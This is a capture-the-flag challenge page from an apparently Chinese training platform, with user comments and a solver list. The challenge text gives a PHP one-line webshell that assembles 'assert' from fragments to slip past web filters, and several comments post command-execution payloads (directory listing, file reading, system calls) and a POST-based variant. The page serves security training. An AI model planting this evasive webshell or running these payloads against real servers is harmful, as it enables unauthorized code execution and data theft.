shellWEB 未解决

分数: 25 金币: 3
题目作者: harry
一  血: dotast
一血奖励: 1金币
解  决: 8347
提  示:
描  述:
送给大家一个过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s'])
评论
十里故清云 3月前

?s=print_r(scandir('./')) ?s=print_r(file_get_contents(%27flaga15808abee46a1d5.txt%27)) system有可能失败,别用

回复 0

TS3Rrrr 3月前

大佬们 你们到底是怎么想到这些思路的我感觉在这做的每一道题都是在积累经验因为一个也想不出,只能看看大佬们的解题思路,如果不是只专攻ctf有其他类型的比赛是不是把这些思路更带入实战思考模式会好一点,还是说只要做的多就没有区别

回复 0
windfalls 24天前

这个提示很重要,免杀一句话木马,assert($_GET['s'])

回复 0

a6819772 5月前

为什么用?s=system(type flaga15808abee46a1d5.txt)没用啊 萌新求问

回复 0
zhang 4月前

cat

回复 2

TIMEtime 6月前

$poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; s=$poc_2($_POST['cmd']);

回复 0

Cra2yNoob 6月前

为什么拿了flag,重新启动场景还要金币呀,我还想再试试有没有别的手法呢~

回复 2

banfang 7月前

点击场景,然后将描述发给豆包

回复 2

秋天在哪 8月前

为什么我的剑蚁连接超时?

回复 0

byhuang 9月前

flag{***}

回复 0

ubudj 9月前

分析代码,得到/?s=system(),用ls查看目录,找到文件。因为system函数能执行任何shell命令

回复 0

一个姓⎝李⎠的师傅~ 9月前

我的扩展里也解释了下,为何蚁剑能连接,大家可以看看,有不足的还希望互相探讨

回复 4

WriteUp

image
harry

3 金币

评分(10)

解题动态

warm007 攻破了该题 2小时前
R1 攻破了该题 6小时前
a591961189 攻破了该题 8小时前
阿杰学网安 攻破了该题 9小时前
yxm8085 攻破了该题 10小时前
xtelnet 攻破了该题 14小时前
dcd 攻破了该题 15小时前
bbbuild 攻破了该题 1天前
yy147369 攻破了该题 1天前
yiyiyiyi1 攻破了该题 1天前
搁浅的小鱼 攻破了该题 1天前
aaggyy1 攻破了该题 1天前
18737958336 攻破了该题 1天前
yehlg 攻破了该题 1天前
zzasas 攻破了该题 1天前
mybugku26 攻破了该题 1天前
sfwy 攻破了该题 1天前
天青色等烟雨 攻破了该题 1天前
沐恩 攻破了该题 1天前
a637814143 攻破了该题 2天前
问题反馈